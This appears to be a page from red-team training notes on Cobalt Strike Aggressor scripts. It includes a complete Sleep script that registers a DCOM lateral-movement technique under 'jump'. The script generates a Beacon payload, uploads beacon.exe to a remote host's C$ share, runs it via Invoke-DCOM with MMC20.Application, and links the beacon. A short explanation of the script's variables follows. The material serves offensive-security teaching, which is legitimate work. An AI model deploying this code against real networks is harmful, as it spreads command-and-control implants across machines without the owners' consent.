Aggressor Scripts

The ".cna" files that we load into the Cobalt Strike Script Manager are called Aggressor Scripts. These can override default behaviours in Cobalt Strike to customise the UI (add new menus, commands, etc), extended the data models.

The Aggressor script reference is public and available at helpsystems.com. The underlying programming language used is called Sleep (http://sleep.dashnine.org/manual/index.html).

Aggressor can be used to register new techniques under jump and remote-exec using beacon_remote_exploit_register (https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#beacon_remote_exploit_register) and beacon_remote_exec_method_register (https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#beacon_remote_exec_method_register) respectively.

Example to integrate integrate Invoke-DCOM.ps1 into jump:

{
    local('$handle $script $oneliner $payload');

    # acknowledge this command1
    btask($1, "Tasked Beacon to run " . listener_describe($3) . " on $2 via DCOM", "T1021");

    # read in the script
    $handle = openf(getFileProper("C:\\Tools", "Invoke-DCOM.ps1"));
    $script = readb($handle, -1);
    closef($handle);

    # host the script in Beacon
    $oneliner = beacon_host_script($1, $script);

    # generate stageless payload
    $payload = artifact_payload($3, "exe", "x64");

    # upload to the target
    bupload_raw($1, "\\\\ $+ $2 $+ \\C$\\Windows\\Temp\\beacon.exe", $payload);

    # run via powerpick
    bpowerpick!($1, "Invoke-DCOM -ComputerName  $+  $2  $+  -Method MMC20.Application -Command C:\\Windows\\Temp\\beacon.exe", $oneliner);

    # link if p2p beacon
    beacon_link($1, $2, $3);
}

beacon_remote_exploit_register("dcom", "x64", "Use DCOM to run a Beacon payload", &invoke_dcom);

local defines variables that are local to the current function, so they will disappear once executed. Sleep can have global, closure-specific and local scopes.

$1 is the Beacon ID.

$2 is the target to jump to.

$3 is the selected listener.

The $script variable holds the raw content of Invoke-DCOM.ps1 (If you want to see the content of these variables, you can use println($oneliner); and they'll appear in the Script Console (Cobalt Strike > Script Console).)

$+ concatenates an interpolated string and requires additional whitespaces on each end.

PreviousBehavioural DetectionsNextBeacon Object Files (BOFs)

Last updated